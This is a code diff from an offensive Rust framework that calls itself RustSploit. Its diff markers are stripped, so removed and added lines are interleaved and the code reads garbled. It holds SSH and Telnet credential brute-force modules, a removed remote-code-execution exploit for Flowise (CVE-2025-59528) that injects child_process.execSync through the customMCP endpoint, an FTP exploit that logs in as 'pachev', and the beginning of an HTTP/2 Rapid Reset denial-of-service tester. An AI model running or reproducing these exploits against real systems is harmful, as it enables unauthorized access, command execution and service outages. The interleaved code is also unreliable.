let users_for_current_pass: Box<dyn Iterator<Item = String>> = if combo_mode {
Box::new(users.iter().cloned())
} else {
if users.is_empty() {
Vec::new()
Box::new(std::iter::empty())
} else {
let user = users[user_cycle_idx % users.len()].clone();
user_cycle_idx += 1;
vec![user]
Box::new(std::iter::once(user))
}
};
if selected_users.is_empty() {
continue;
}
for user in selected_users {
if stop_on_success && stop.load(Ordering::Relaxed) {
for user_str in users_for_current_pass {
if *stop.lock().await {
break;
}
let addr_clone = connect_addr.clone();
let user_clone = user.clone();
let pass_clone = pass.clone();
let permit = Arc::clone(&semaphore).acquire_owned().await?;
let task_addr = connect_addr.clone();
let task_user = user_str;
let task_pass = pass_str.clone();
let found_clone = Arc::clone(&found);
let stop_clone = Arc::clone(&stop);
let stop_flag = stop_on_success;
let verbose_flag = verbose;
tasks.push(tokio::spawn(async move {
if stop_flag && stop_clone.load(Ordering::Relaxed) {
let task = tokio::spawn(async move {
let _permit = permit;
if *stop_clone.lock().await {
return;
}
match try_ssh_login(&addr_clone, &user_clone, &pass_clone).await {
match try_ssh_login(&task_addr, &task_user, &task_pass).await {
Ok(true) => {
println!("[+] {} -> {}:{}", addr_clone, user_clone, pass_clone);
found_clone
.lock()
.await
.push((addr_clone.clone(), user_clone.clone(), pass_clone.clone()));
if stop_flag {
stop_clone.store(true, Ordering::Relaxed);
println!("[+] {} -> {}:{}", task_addr, task_user, task_pass);
found_clone.lock().await.push((task_addr.clone(), task_user.clone(), task_pass.clone()));
if stop_on_success {
*stop_clone.lock().await = true;
}
}
Ok(false) => {
log(verbose_flag, &format!("[-] {} -> {}:{}", addr_clone, user_clone, pass_clone));
log(verbose, &format!("[-] {} -> {}:{}", task_addr, task_user, task_pass));
}
Err(e) => {
log(verbose_flag, &format!("[!] {}: error: {}", addr_clone, e));
log(verbose, &format!("[!] {}: error: {}", task_addr, e));
}
}
sleep(Duration::from_millis(10)).await;
}));
if tasks.len() >= concurrency {
if let Some(res) = tasks.next().await {
if let Err(e) = res {
log(verbose, &format!("[!] Task join error: {}", e));
}
}
}
});
tasks.push(task);
}
}
while let Some(res) = tasks.next().await {
if let Err(e) = res {
log(verbose, &format!("[!] Task join error: {}", e));
}
for task in tasks {
let _ = task.await;
}
let creds = found.lock().await;
@@ -191,52 +171,42 @@ async fn try_ssh_login(normalized_addr: &str, user: &str, pass: &str) -> Result<
Ok(result)
}
fn normalize_target(host: &str, default_port: u16) -> Result<String> {
let re = Regex::new(r"^\[*(?P<addr>[^\]]+?)\]*(?::(?P<port>\d{1,5}))?$").unwrap();
let trimmed = host.trim();
let caps = re
.captures(trimmed)
.ok_or_else(|| anyhow!("Invalid target format: {}", host))?;
let addr = caps.name("addr").unwrap().as_str();
let port = if let Some(m) = caps.name("port") {
m.as_str()
.parse::<u16>()
.map_err(|_| anyhow!("Invalid port value in target '{}'", host))?
} else {
default_port
};
let formatted = if addr.contains(':') && !addr.contains('.') {
format!("[{}]:{}", addr, port)
} else {
format!("{}:{}", addr, port)
};
formatted
.to_socket_addrs()
.map_err(|e| anyhow!("Could not resolve '{}': {}", formatted, e))?
.next()
.ok_or_else(|| anyhow!("Could not resolve '{}'", formatted))?;
Ok(formatted)
}
fn prompt_existing_file(msg: &str) -> Result<String> {
loop {
let candidate = prompt_required(msg)?;
if Path::new(&candidate).is_file() {
return Ok(candidate);
} else {
println!(
"{}",
format!("File '{}' does not exist or is not a regular file.", candidate).yellow()
);
fn format_host_port(input: &str) -> Result<String> {
if input.starts_with('[') {
if let Some(end_bracket_idx) = input.find("]:") {
let host_part = &input[1..end_bracket_idx];
if !host_part.contains('[') && !host_part.contains(']') {
if (&input[end_bracket_idx+2..]).parse::<u16>().is_ok() {
return Ok(input.to_string());
}
}
}
}
let (host_candidate, port_str) = match input.rfind(':') {
Some(idx) if idx > 0 => { // Ensure colon is not the first character
let (h, p) = input.split_at(idx);
(h, &p[1..]) // Strip colon from port part
}
_ => return Err(anyhow!("Invalid target address format: '{}' - missing port or malformed", input)),
};
if port_str.parse::<u16>().is_err() {
return Err(anyhow!("Invalid port in address: '{}'", input));
}
let stripped_host = host_candidate.trim_matches(|c| c == '[' || c == ']');
if stripped_host.contains(':') {
Ok(format!("[{}]:{}", stripped_host, port_str))
} else {
Ok(format!("{}:{}", stripped_host, port_str))
}
}
fn prompt_required(msg: &str) -> Result<String> {
loop {
print!("{}", format!("{}: ", msg).cyan().bold());
print!("{}: ", msg);
std::io::stdout().flush()?;
let mut s = String::new();
std::io::stdin().read_line(&mut s)?;
@@ -244,13 +214,13 @@ fn prompt_required(msg: &str) -> Result<String> {
if !trimmed.is_empty() {
return Ok(trimmed.to_string());
} else {
println!("{}", "This field is required.".yellow());
println!("This field is required.");
}
}
}
fn prompt_default(msg: &str, default: &str) -> Result<String> {
print!("{}", format!("{} [{}]: ", msg, default).cyan().bold());
print!("{} [{}]: ", msg, default);
std::io::stdout().flush()?;
let mut s = String::new();
std::io::stdin().read_line(&mut s)?;
@@ -265,7 +235,7 @@ fn prompt_default(msg: &str, default: &str) -> Result<String> {
fn prompt_yes_no(msg: &str, default_yes: bool) -> Result<bool> {
let default_char = if default_yes { "y" } else { "n" };
loop {
print!("{}", format!("{} (y/n) [{}]: ", msg, default_char).cyan().bold());
print!("{} (y/n) [{}]: ", msg, default_char);
std::io::stdout().flush()?;
let mut s = String::new();
std::io::stdin().read_line(&mut s)?;
@@ -277,7 +247,7 @@ fn prompt_yes_no(msg: &str, default_yes: bool) -> Result<bool> {
} else if input == "n" || input == "no" {
return Ok(false);
} else {
println!("{}", "Invalid input. Please enter 'y' or 'n'.".yellow());
println!("Invalid input. Please enter 'y' or 'n'.");
}
}
}
+44 -370
View File
@@ -1,50 +1,32 @@
use anyhow::{anyhow, Context, Result};
use anyhow::{Result, Context};
use regex::Regex;
use std::fs::{File, OpenOptions};
use std::io::{self, BufRead, BufReader, Write};
use std::net::{TcpStream, ToSocketAddrs};
use std::path::Path;
use std::sync::{Arc, Mutex};
use std::sync::atomic::{AtomicBool, Ordering, AtomicUsize};
use std::time::Duration;
use std::thread;
use telnet::Event;
use threadpool::ThreadPool;
use crossbeam_channel::{unbounded, Sender};
use crossbeam_channel::unbounded;
use telnet::Telnet;
pub async fn run(target: &str) -> Result<()> {
println!("\n=== Telnet Bruteforce Module (RustSploit) ===\n");
let target = target.trim().to_string();
let port = prompt_port(23);
let username_wordlist = prompt_wordlist("Username wordlist file: ")?;
let raw_bruteforce = prompt_yes_no(
"Enable raw brute-force password generation? (y/n): ",
false,
);
let password_wordlist = if raw_bruteforce {
prompt_optional_wordlist("Password wordlist file (leave blank to skip): ")?
} else {
Some(prompt_wordlist("Password wordlist file: ")?)
};
let (raw_charset, raw_max_length) = if raw_bruteforce {
let charset = prompt_charset(
"Raw brute-force character set (default a-zA-Z0-9!@#$%^&*()-_=+[]{}|;:'\",.<>?/\\): ",
"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-_=+[]{}|;:'\",.<>?/\\",
);
let max_len = prompt_max_length(4, 1, 6);
(charset, max_len)
} else {
(String::new(), 0)
};
let threads = prompt_threads(8);
let stop_on_success = prompt_yes_no("Stop on first valid login? (y/n): ", false);
let full_combo = prompt_yes_no(
"Try every username with every password? (y/n): ",
false,
);
let verbose = prompt_yes_no("Verbose mode? (y/n): ", false);
let target = target.to_string();
let port = prompt("Port (default 23): ").parse().unwrap_or(23);
let username_wordlist = prompt("Username wordlist file: ");
let password_wordlist = prompt("Password wordlist file: ");
let threads = prompt("Number of threads (default 8): ").parse().unwrap_or(8);
let stop_on_success = prompt("Stop on first valid login? (y/n): ")
.trim()
.eq_ignore_ascii_case("y");
let full_combo = prompt("Try every username with every password? (y/n): ")
.trim()
.eq_ignore_ascii_case("y");
let verbose = prompt("Verbose mode? (y/n): ")
.trim()
.eq_ignore_ascii_case("y");
let config = TelnetBruteforceConfig {
target,
@@ -55,9 +37,6 @@ pub async fn run(target: &str) -> Result<()> {
stop_on_success,
verbose,
full_combo,
raw_bruteforce,
raw_charset,
raw_max_length,
};
run_telnet_bruteforce(config)
@@ -68,14 +47,11 @@ struct TelnetBruteforceConfig {
target: String,
port: u16,
username_wordlist: String,
password_wordlist: Option<String>,
password_wordlist: String,
threads: usize,
stop_on_success: bool,
verbose: bool,
full_combo: bool,
raw_bruteforce: bool,
raw_charset: String,
raw_max_length: usize,
}
fn run_telnet_bruteforce(config: TelnetBruteforceConfig) -> Result<()> {
@@ -90,85 +66,34 @@ fn run_telnet_bruteforce(config: TelnetBruteforceConfig) -> Result<()> {
println!("\n[*] Starting Telnet bruteforce on {}", socket_addr);
let usernames = read_lines(&config.username_wordlist)?;
if usernames.is_empty() {
return Err(anyhow!(
"Username wordlist '{}' is empty",
config.username_wordlist
));
}
let passwords = if let Some(ref pwd_path) = config.password_wordlist {
let list = read_lines(pwd_path)?;
if list.is_empty() && !config.raw_bruteforce {
return Err(anyhow!("Password wordlist '{}' is empty", pwd_path));
}
list
} else {
Vec::new()
};
if !config.raw_bruteforce && passwords.is_empty() {
return Err(anyhow!(
"No passwords available (wordlist empty and raw brute-force disabled)"
));
}
if config.raw_bruteforce && config.raw_charset.is_empty() {
return Err(anyhow!("Raw brute-force enabled but character set is empty"));
}
if config.raw_bruteforce && config.raw_max_length == 0 {
return Err(anyhow!("Raw brute-force enabled but max length is zero"));
}
let passwords = read_lines(&config.password_wordlist)?;
let creds = Arc::new(Mutex::new(Vec::new()));
let stop_flag = Arc::new(AtomicBool::new(false));
let stop_flag = Arc::new(Mutex::new(false));
let pool = ThreadPool::new(config.threads);
let attempt_counter = Arc::new(AtomicUsize::new(0));
let (tx, rx) = unbounded();
println!("[*] Loaded {} username(s).", usernames.len());
if !passwords.is_empty() {
println!("[*] Loaded {} password(s) from wordlist.", passwords.len());
}
// 2) Build the combo queue
if !passwords.is_empty() {
enqueue_wordlist_combos(
&tx,
&usernames,
&passwords,
config.full_combo,
Arc::clone(&attempt_counter),
)?;
if config.full_combo {
for u in &usernames {
for p in &passwords {
tx.send((u.clone(), p.clone()))?;
}
}
} else if usernames.len() == 1 {
for p in &passwords {
tx.send((usernames[0].clone(), p.clone()))?;
}
} else if passwords.len() == 1 {
for u in &usernames {
tx.send((u.clone(), passwords[0].clone()))?;
}
} else {
println!("[!] Multiple creds & full_combo=OFF → using first username.");
for p in &passwords {
tx.send((usernames[0].clone(), p.clone()))?;
}
}
let mut generators = Vec::new();
if config.raw_bruteforce {
println!(
"[*] Raw brute-force enabled. Charset size: {}. Max length: {}.",
config.raw_charset.chars().count(),
config.raw_max_length
);
let tx_clone = tx.clone();
let usernames_clone = usernames.clone();
let charset: Vec<char> = config.raw_charset.chars().collect();
let max_len = config.raw_max_length;
let stop_clone = Arc::clone(&stop_flag);
let counter_clone = Arc::clone(&attempt_counter);
let full_combo = config.full_combo;
generators.push(thread::spawn(move || {
generate_raw_passwords(
tx_clone,
usernames_clone,
charset,
max_len,
full_combo,
stop_clone,
counter_clone,
);
}));
}
drop(tx);
// 3) Spawn workers
@@ -181,7 +106,7 @@ fn run_telnet_bruteforce(config: TelnetBruteforceConfig) -> Result<()> {
pool.execute(move || {
while let Ok((user, pass)) = rx.recv() {
if stop_flag.load(Ordering::Relaxed) {
if *stop_flag.lock().unwrap() {
break;
}
if cfg.verbose {
@@ -192,7 +117,7 @@ fn run_telnet_bruteforce(config: TelnetBruteforceConfig) -> Result<()> {
println!("[+] Valid: {}:{}", user, pass);
creds.lock().unwrap().push((user, pass));
if cfg.stop_on_success {
stop_flag.store(true, Ordering::Relaxed);
*stop_flag.lock().unwrap() = true;
break;
}
}
@@ -208,15 +133,6 @@ fn run_telnet_bruteforce(config: TelnetBruteforceConfig) -> Result<()> {
}
pool.join();
for handle in generators {
let _ = handle.join();
}
println!(
"[*] Total credential attempts queued: {}",
attempt_counter.load(Ordering::Relaxed)
);
// 4) Report & optional save
let found = creds.lock().unwrap();
if found.is_empty() {
@@ -299,13 +215,7 @@ fn try_telnet_login(addr: &str, username: &str, password: &str) -> Result<bool>
fn read_lines(path: &str) -> Result<Vec<String>> {
let f = File::open(path).context(format!("Unable to open {}", path))?;
Ok(
BufReader::new(f)
.lines()
.filter_map(|line| line.ok().map(|l| l.trim().to_string()))
.filter(|line| !line.is_empty())
.collect(),
)
Ok(BufReader::new(f).lines().filter_map(Result::ok).collect())
}
fn save_results(path: &str, creds: &[(String, String)]) -> Result<()> {
@@ -322,17 +232,10 @@ fn save_results(path: &str, creds: &[(String, String)]) -> Result<()> {
fn prompt(msg: &str) -> String {
print!("{}", msg);
if let Err(e) = io::stdout().flush() {
eprintln!("[!] Failed to flush stdout: {}", e);
}
io::stdout().flush().unwrap();
let mut buf = String::new();
match io::stdin().read_line(&mut buf) {
Ok(_) => buf.trim().to_string(),
Err(e) => {
eprintln!("[!] Failed to read input: {}", e);
String::new()
}
}
io::stdin().read_line(&mut buf).unwrap();
buf.trim().to_string()
}
/// Enhanced IPv4/IPv6/domain normalizer & resolver
@@ -358,232 +261,3 @@ fn normalize_target(host: &str, default_port: u16) -> Result<String> {
.context(format!("Could not resolve {}", formatted))?;
Ok(formatted)
}
fn prompt_port(default: u16) -> u16 {
loop {
let input = prompt("Port (default 23): ");
if input.is_empty() {
return default;
}
match input.parse::<u16>() {
Ok(port) if port > 0 => return port,
_ => println!("[!] Invalid port value. Please enter a number between 1 and 65535."),
}
}
}
fn prompt_threads(default: usize) -> usize {
loop {
let input = prompt("Number of threads (default 8): ");
if input.is_empty() {
return default.max(1);
}
match input.parse::<usize>() {
Ok(val) if val >= 1 && val <= 256 => return val,
_ => println!("[!] Invalid thread count. Please enter a value between 1 and 256."),
}
}
}
fn prompt_yes_no(message: &str, default: bool) -> bool {
loop {
let input = prompt(message);
if input.is_empty() {
return default;
}
match input.to_lowercase().as_str() {
"y" | "yes" | "true" => return true,
"n" | "no" | "false" => return false,
_ => println!("[!] Please respond with y or n."),
}
}
}
fn prompt_wordlist(prompt_text: &str) -> Result<String> {
loop {
let path = prompt(prompt_text);
if path.is_empty() {
println!("[!] Path cannot be empty.");
continue;
}
let trimmed = path.trim();
let candidate = Path::new(trimmed);
if candidate.is_file() {
return Ok(trimmed.to_string());
} else {
println!("[!] File '{}' does not exist or is not a regular file.", trimmed);
}
}
}
fn prompt_optional_wordlist(prompt_text: &str) -> Result<Option<String>> {
loop {
let path = prompt(prompt_text);
if path.is_empty() {
return Ok(None);
}
let trimmed = path.trim();
let candidate = Path::new(trimmed);
if candidate.is_file() {
return Ok(Some(trimmed.to_string()));
} else {
println!("[!] File '{}' does not exist or is not a regular file.", trimmed);
}
}
}
fn prompt_charset(prompt_text: &str, default: &str) -> String {
let input = prompt(prompt_text);
let charset = if input.is_empty() {
default.to_string()
} else {
input.trim().to_string()
};
if charset.is_empty() {
default.to_string()
} else {
charset
}
}
fn prompt_max_length(default: usize, min: usize, max: usize) -> usize {
loop {
let input = prompt(&format!(
"Maximum password length ({}-{}, default {}): ",
min, max, default
));
if input.is_empty() {
return default.clamp(min, max);
}
match input.parse::<usize>() {
Ok(val) if val >= min && val <= max => return val,
_ => println!(
"[!] Invalid length. Please enter a value between {} and {}.",
min, max
),
}
}
}
fn enqueue_wordlist_combos(
tx: &Sender<(String, String)>,
usernames: &[String],
passwords: &[String],
full_combo: bool,
counter: Arc<AtomicUsize>,
) -> Result<()> {
if passwords.is_empty() {
return Ok(());
}
if full_combo {
for u in usernames {
for p in passwords {
tx.send((u.clone(), p.clone()))?;
counter.fetch_add(1, Ordering::Relaxed);
}
}
} else if usernames.len() == 1 {
for p in passwords {
tx.send((usernames[0].clone(), p.clone()))?;
counter.fetch_add(1, Ordering::Relaxed);
}
} else if passwords.len() == 1 {
for u in usernames {
tx.send((u.clone(), passwords[0].clone()))?;
counter.fetch_add(1, Ordering::Relaxed);
}
} else {
println!("[!] Multiple creds & full_combo=OFF → using first username.");
for p in passwords {
tx.send((usernames[0].clone(), p.clone()))?;
counter.fetch_add(1, Ordering::Relaxed);
}
}
Ok(())
}
fn generate_raw_passwords(
tx: Sender<(String, String)>,
usernames: Vec<String>,
charset: Vec<char>,
max_len: usize,
full_combo: bool,
stop_flag: Arc<AtomicBool>,
counter: Arc<AtomicUsize>,
) {
if charset.is_empty() || max_len == 0 {
return;
}
let usernames_to_use: Vec<String> = if full_combo || usernames.len() == 1 {
usernames
} else {
vec![usernames[0].clone()]
};
for length in 1..=max_len {
if stop_flag.load(Ordering::Relaxed) {
break;
}
let mut current = Vec::with_capacity(length);
generate_passwords_recursive(
&tx,
&usernames_to_use,
&charset,
length,
&mut current,
&stop_flag,
&counter,
);
if stop_flag.load(Ordering::Relaxed) {
break;
}
}
}
fn generate_passwords_recursive(
tx: &Sender<(String, String)>,
usernames: &[String],
charset: &[char],
remaining: usize,
current: &mut Vec<char>,
stop_flag: &Arc<AtomicBool>,
counter: &Arc<AtomicUsize>,
) {
if stop_flag.load(Ordering::Relaxed) {
return;
}
if remaining == 0 {
let password: String = current.iter().collect();
for user in usernames {
if stop_flag.load(Ordering::Relaxed) {
break;
}
if tx.send((user.clone(), password.clone())).is_err() {
return;
}
counter.fetch_add(1, Ordering::Relaxed);
}
return;
}
for &ch in charset {
if stop_flag.load(Ordering::Relaxed) {
break;
}
current.push(ch);
generate_passwords_recursive(
tx,
usernames,
charset,
remaining - 1,
current,
stop_flag,
counter,
);
current.pop();
}
}
@@ -1,185 +0,0 @@
// CVE-2025-59528 - Flowise < 3.0.5 Remote Code Execution
// Exploit Author: nltt0 (https://github.com/nltt-br)
// Vendor Homepage: https://flowiseai.com/
// Software Link: https://github.com/FlowiseAI/Flowise
// Version: < 3.0.5
use anyhow::{anyhow, Context, Result};
use colored::*;
use reqwest::Client;
use serde_json::json;
use std::io::{self, Write};
use std::time::Duration;
/// Displays module banner
fn banner() {
println!(
"{}",
r#"
_____ _ _____
/ __ \ | | / ___|
| / \/ __ _| | __ _ _ __ __ _ ___ ___ \ `--.
| | / _` | |/ _` | '_ \ / _` |/ _ \/ __| `--. \
| \__/\ (_| | | (_| | | | | (_| | (_) \__ \/\__/ /
\____/\__,_|_|\__,_|_| |_|\__, |\___/|___/\____/
__/ |
|___/
by nltt0
"#
.cyan()
);
}
/// Login to Flowise and return authenticated session
async fn login(client: &Client, url: &str, email: &str, password: &str) -> Result<String> {
let login_url = format!("{}/api/v1/auth/login", url.trim_end_matches('/'));
let data = json!({
"email": email,
"password": password
});
let response = client
.post(&login_url)
.header("x-request-from", "internal")
.header("Accept-Language", "pt-BR,pt;q=0.9")
.header("Accept", "application/json, text/plain, */*")
.header("Content-Type", "application/json")
.header("User-Agent", "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36")
.header("Origin", "http://workflow.flow.hc")
.header("Referer", "http://workflow.flow.hc/signin")
.header("Accept-Encoding", "gzip, deflate, br")
.header("Connection", "keep-alive")
.json(&data)
.send()
.await
.context("Failed to send login request")?;
if response.status().is_success() {
// Extract session token/cookie from response
// The actual token extraction depends on Flowise's response format
// For now, we'll use the cookie jar from the client
Ok("authenticated".to_string())
} else {
Err(anyhow!("Login failed with status: {}", response.status()))
}
}
/// Execute remote code via the customMCP endpoint
async fn execute_rce(
client: &Client,
url: &str,
email: &str,
password: &str,
cmd: &str,
) -> Result<()> {
// First, login to get authenticated session
println!("{}", "[*] Attempting to login...".yellow());
login(client, url, email, password).await?;
println!("{}", "[+] Login successful".green());
let rce_url = format!("{}/api/v1/node-load-method/customMCP", url.trim_end_matches('/'));
// Escape the command for JavaScript execution
let escaped_cmd = cmd.replace('\\', "\\\\").replace('"', "\\\"").replace('\n', "\\n");
// Construct the malicious payload
let command = format!(
r#"({{x:(function(){{const cp = process.mainModule.require("child_process");cp.execSync("{}");return 1;}})()}})"#,
escaped_cmd
);
let data = json!({
"loadMethod": "listActions",
"inputs": {
"mcpServerConfig": command
}
});
println!("{}", format!("[*] Executing command: {}", cmd).yellow());
let response = client
.post(&rce_url)
.header("x-request-from", "internal")
.header("Content-Type", "application/json")
.json(&data)
.send()
.await
.context("Failed to send RCE request")?;
if response.status() == 401 {
// Retry with internal header if we get 401
println!("{}", "[*] Received 401, retrying with internal header...".yellow());
let retry_response = client
.post(&rce_url)
.header("x-request-from", "internal")
.json(&data)
.send()
.await
.context("Failed to retry RCE request")?;
if retry_response.status().is_success() {
println!("{}", format!("[+] Command executed successfully: {}", cmd).green().bold());
} else {
println!("{}", format!("[-] Command execution failed with status: {}", retry_response.status()).red());
}
} else if response.status().is_success() {
println!("{}", format!("[+] Command executed successfully: {}", cmd).green().bold());
} else {
println!("{}", format!("[-] Command execution failed with status: {}", response.status()).red());
}
Ok(())
}
/// Main entry point for auto-dispatch system
pub async fn run(target: &str) -> Result<()> {
banner();
let mut base_url = target.trim().to_string();
if !base_url.starts_with("http://") && !base_url.starts_with("https://") {
base_url = format!("http://{}", base_url);
}
base_url = base_url.trim_end_matches('/').to_string();
println!("{}", format!("[*] Target URL: {}", base_url).yellow());
// Build HTTP client with cookie support and SSL verification disabled
let client = Client::builder()
.timeout(Duration::from_secs(30))
.danger_accept_invalid_certs(true)
.cookie_store(true)
.build()
.context("Failed to create HTTP client")?;
// Prompt for credentials and command
let mut email = String::new();
let mut password = String::new();
let mut command = String::new();
print!("{}", "Email: ".cyan().bold());
io::stdout().flush()?;
io::stdin().read_line(&mut email)?;
print!("{}", "Password: ".cyan().bold());
io::stdout().flush()?;
io::stdin().read_line(&mut password)?;
print!("{}", "Command to execute: ".cyan().bold());
io::stdout().flush()?;
io::stdin().read_line(&mut command)?;
let email = email.trim();
let password = password.trim();
let command = command.trim();
if email.is_empty() || password.is_empty() || command.is_empty() {
return Err(anyhow!("Email, password, and command must be provided"));
}
execute_rce(&client, &base_url, email, password, command).await?;
Ok(())
}
-2
View File
@@ -1,2 +0,0 @@
pub mod cve_2025_59528_flowise_rce;
@@ -2,7 +2,7 @@ use anyhow::{anyhow, Result};
use ftp::FtpStream;
use std::net::ToSocketAddrs;
use std::fs::{File, OpenOptions};
use std::io::{self, copy, BufRead, BufReader, Write};
use std::io::{copy, BufRead, BufReader, Write};
use std::path::Path;
use tokio::task;
use tokio::sync::Semaphore;
@@ -35,13 +35,10 @@ fn exploit_target(target: String, port: u16) -> Result<String> {
println!("{}", format!("[*] Connecting to FTP service at {}...", addr).yellow());
// Resolve address with better error handling
let socket_addr = addr.to_socket_addrs()?
.next()
.ok_or_else(|| anyhow!("Failed to resolve address: {}", addr))?;
let mut ftp = FtpStream::connect(socket_addr)
.map_err(|e| anyhow!("FTP connection error to {}: {}", addr, e))?;
let mut ftp = FtpStream::connect(
addr.to_socket_addrs()?.next().ok_or_else(|| anyhow!("Failed to resolve address"))?
)
.map_err(|e| anyhow!("FTP connection error: {}", e))?;
ftp.login("pachev", "").map_err(|e| anyhow!("FTP login failed: {}", e))?;
println!("{}", "[+] Logged in successfully as 'pachev'.".green());
@@ -80,28 +77,25 @@ fn save_result(line: &str) -> Result<()> {
pub async fn run(target: &str) -> Result<()> {
let target = target.to_string(); // // Own target early to avoid lifetime issues
print!("{}", "Enter the FTP port (default 21): ".cyan().bold());
io::stdout().flush()?;
println!("Enter the FTP port (default 21):");
let mut port_input = String::new();
io::stdin().read_line(&mut port_input)?;
std::io::stdin().read_line(&mut port_input)?;
let port_input = port_input.trim();
let port = if port_input.is_empty() {
21
} else {
port_input.parse::<u16>().map_err(|_| anyhow!("Invalid port number: {}", port_input))?
port_input.parse::<u16>().map_err(|_| anyhow!("Invalid port number"))?
};
print!("{}", "Do you want to use a list of IPs? (yes/no): ".cyan().bold());
io::stdout().flush()?;
println!("Do you want to use a list of IPs? (yes/no):");
let mut use_list = String::new();
io::stdin().read_line(&mut use_list)?;
std::io::stdin().read_line(&mut use_list)?;
let use_list = use_list.trim().to_lowercase();
if use_list == "yes" || use_list == "y" {
print!("{}", "Enter path to the IP list file: ".cyan().bold());
io::stdout().flush()?;
println!("Enter path to the IP list file:");
let mut path = String::new();
io::stdin().read_line(&mut path)?;
std::io::stdin().read_line(&mut path)?;
let path = path.trim();
if !Path::new(path).exists() {
@@ -122,33 +116,32 @@ pub async fn run(target: &str) -> Result<()> {
continue;
}
let ip_owned = ip.to_string();
let ip_for_errors = ip_owned.clone(); // Clone for error messages
let port = port;
let target_clone = target.clone(); // // Clone per task
let permit = semaphore.clone().acquire_owned().await?;
println!("{}", format!("[*] Launching task for target: {}", ip_owned).yellow());
futures.push(tokio::spawn(async move {
let _permit = permit; // // Hold permit alive
let ip_for_errors = ip_for_errors.clone(); // Clone for error messages in closure
let exploit_task = task::spawn_blocking(move || exploit_target(ip_owned, port));
match timeout(Duration::from_secs(FTP_TIMEOUT_SECONDS), exploit_task).await {
Ok(Ok(Ok(success))) => {
println!("{}", format!("[+] Success: {}", success).green().bold());
let _ = save_result(&success);
println!("{}", format!("[+] Success: {}", success).green());
save_result(&success)?;
}
Ok(Ok(Err(e))) => {
println!("{}", format!("[-] Exploit error for {}: {}", ip_for_errors, e).red());
let _ = save_result(&format!("{} FAIL: {}", ip_for_errors, e));
println!("{}", format!("[!] Exploit error: {}", e).red());
save_result(&format!("{} FAIL: {}", target_clone, e))?;
}
Ok(Err(e)) => {
println!("{}", format!("[-] Join error for {}: {}", ip_for_errors, e).red());
let _ = save_result(&format!("{} FAIL: Join error {}", ip_for_errors, e));
println!("{}", format!("[!] Join error: {}", e).red());
save_result(&format!("{} FAIL: Join error {}", target_clone, e))?;
}
Err(_) => {
println!("{}", format!("[-] Timeout while exploiting {} ({}s)", ip_for_errors, FTP_TIMEOUT_SECONDS).yellow());
let _ = save_result(&format!("{} TIMEOUT", ip_for_errors));
println!("{}", format!("[!] Timeout while exploiting {}", target_clone).red());
save_result(&format!("{} TIMEOUT", target_clone))?;
}
}
@@ -172,24 +165,23 @@ pub async fn run(target: &str) -> Result<()> {
let target_owned = target.to_string();
let port = port;
println!("{}", format!("[*] Exploiting single target: {}:{}", target, port).yellow());
let exploit_task = task::spawn_blocking(move || exploit_target(target_owned, port));
match timeout(Duration::from_secs(FTP_TIMEOUT_SECONDS), exploit_task).await {
Ok(Ok(Ok(success))) => {
println!("{}", format!("[+] Success: {}", success).green().bold());
let _ = save_result(&success);
println!("{}", format!("[+] Success: {}", success).green());
save_result(&success)?;
}
Ok(Ok(Err(e))) => {
println!("{}", format!("[-] Exploit error: {}", e).red());
let _ = save_result(&format!("{} FAIL: {}", target, e));
println!("{}", format!("[!] Exploit error: {}", e).red());
save_result(&format!("{} FAIL: {}", target, e))?;
}
Ok(Err(e)) => {
println!("{}", format!("[-] Join error: {}", e).red());
let _ = save_result(&format!("{} FAIL: Join error {}", target, e));
println!("{}", format!("[!] Join error: {}", e).red());
save_result(&format!("{} FAIL: Join error {}", target, e))?;
}
Err(_) => {
println!("{}", format!("[-] Timeout while exploiting {} ({}s)", target, FTP_TIMEOUT_SECONDS).yellow());
let _ = save_result(&format!("{} TIMEOUT", target));
println!("{}", format!("[!] Timeout while exploiting {}", target).red());
save_result(&format!("{} TIMEOUT", target))?;
}
}
}
@@ -1,445 +0,0 @@
// CVE-2023-44487 - HTTP/2 Rapid Reset Denial of Service
// Exploit Author: Madhusudhan Rajappa
// Date: 29th August 2025
// Version: HTTP/2.0
use anyhow::{anyhow, Context, Result};
use colored::*;
use h2::client::Builder;
use std::io::{self, Write};
use std::net::ToSocketAddrs;
use std::time::{Duration, Instant};
use tokio::net::TcpStream;
use tokio::time::timeout;
use tokio_rustls::TlsConnector;
/// Displays module banner
fn banner() {
println!(
"{}",
r#"
╔═══════════════════════════════════════════════════════════╗
║ CVE-2023-44487 HTTP/2 Rapid Reset DoS Vulnerability ║
║ Tester ║
║ ║
║ WARNING: Only use on systems you own or have ║
║ permission to test! ║
╚═══════════════════════════════════════════════════════════╝
"#
.cyan()
);
}
/// Normalize IPv6 host with brackets
fn normalize_host(host: &str) -> String {
let stripped = host.trim_matches(|c| c == '[' || c == ']');
if stripped.contains(':') {
format!("[{}]", stripped)
} else {
stripped.to_string()
}
}
/// Perform baseline test with normal HTTP/2 requests
async fn baseline_test(
host: &str,
port: u16,
use_ssl: bool,
num_requests: usize,
) -> Result<()> {
println!("{}", format!("\n[*] Performing baseline test with {} normal requests...", num_requests).yellow());
let host_normalized = normalize_host(host);
let addr = format!("{}:{}", host_normalized, port);
let socket_addr = addr
.to_socket_addrs()
.context("Invalid target address format")?
.next()
.context("Could not resolve target address")?;
let stream = TcpStream::connect(socket_addr).await?;
if use_ssl {
let root_store = tokio_rustls::rustls::RootCertStore::empty();
let config = tokio_rustls::rustls::ClientConfig::builder()
.with_safe_defaults()
.with_root_certificates(root_store)
.with_no_client_auth();
let connector = TlsConnector::from(std::sync::Arc::new(config));
let server_name = tokio_rustls::rustls::ServerName::try_from(host)
.map_err(|_| anyhow!("Invalid server name"))?;
let tls_stream = connector.connect(server_name, stream).await?;
let (mut sender, connection) = Builder::new()
.handshake::<_, bytes::BytesMut>(tls_stream)
.await?;
// Spawn connection task
tokio::spawn(async move {
if let Err(e) = connection.await {
eprintln!("Connection error: {:?}", e);
}
});
let mut successful = 0;
let start = Instant::now();
for i in 0..num_requests {
let request = http::Request::builder()
.uri(format!("https://{}:{}/", host, port))
.body(())
.unwrap();
match sender.send_request(request, true) {
Ok(_send_stream) => {
// Request sent successfully with end_of_stream=true
successful += 1;
}
Err(_) => {
break;
}
}
if i < num_requests - 1 {
tokio::time::sleep(Duration::from_millis(100)).await;
}
}
let duration = start.elapsed();
println!("{}", format!("[+] Baseline Results:").green());
println!(" Total Requests: {}", num_requests);
println!(" Successful: {}", successful);
